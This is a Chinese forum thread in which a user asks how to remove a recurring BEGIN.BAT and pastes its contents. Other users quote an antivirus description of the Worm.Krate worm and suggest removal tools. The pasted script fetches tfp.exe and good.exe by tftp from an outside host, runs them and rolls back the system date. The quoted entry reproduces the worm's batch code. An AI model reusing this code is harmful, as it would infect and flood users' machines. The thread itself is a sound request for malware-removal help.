求救

苇溪

我的C盘windows目录下有个BEGIN.BAT
改了我的系统时间 删了还有
大家有谁知道该怎么弄啊 我都整了一天了
谢谢了

苇溪

set a=2007-09-13 星期四
date=2001-01-01
ftp.exe -s:C:\WINDOWS\help.dll
if not exist tfp.exe sft -s:C:\WINDOWS\help.dll
if not exist tfp.exe tftp -i zy365.3322.org get tfp.exe
if not exist good.exe tftp -i zy365.3322.org get good.exe
tfp.exe
tfp.exe
good.exe
good.exe
date=%a%
:end
del C:\WINDOWS\help.dll
del C:\WINDOWS\BEGIN.BAT
exit

y37007

    中毒了，杀吧


Worm.Krate
  

病毒别名：Flooder.Win32.Krate[AVP] / Flooder.Win32.Krate[KV]
处理时间：
威胁级别：★★
中文名称：深水炸弹
病毒类型：蠕虫
影响系统：Win9x / WinNT
病毒行为:
这是一个疯狂创建子目录的病毒。它会在C盘下面创建文件夹begin，并在该目录中生成恶意BAT文件。随后就在该文件夹下疯狂创建子文件夹，子文件夹名字为"1",在某些子文件夹下会生成恶意BAT文件。它一直创建子文件直到不能在创建为止，消耗用户系统资源。在最深一层的目录里面生成端口炸弹病毒程序。

1.在C:\begin生成文件begin.bat，内容为：
rem don't amaize why i am calling a !.bat file... or you look the rem code of the !.bat yourself... actually it's a too long path and rem xp doesn't support........
echo off
:br
cd 1
if exist run.bat goto bgn
) else (
goto :br

:bgn
start /low run.bat
goto end
:end
exit

2.在C:\begin的某个子文件夹中生成文件run.bat和只读、隐藏文件$!.sys.dll，run.bat文件内容为：
echo off
:br
cd 1
if exist $!.sys.dll goto bgn
) else (
goto :br

:bgn
$!.sys.dll
goto end
:end
exit

$!.sys.dll其实是可执行程序，它是该病毒释放的端口炸弹病毒程序，默认是攻击139端口。

苇溪

怎么杀啊 小红伞和绿色版大蜘蛛都没有扫描到

平淡

费尔木马强力清除助手2.0.
http://bbs.kafan.cn/viewthread.php?tid=50114
看一下，楼主可以把它上传发到样本区看看

shenrenrenren

杀不了就扫个报告上来。

苇溪

没杀了 重装了 呵呵
谢谢楼上各位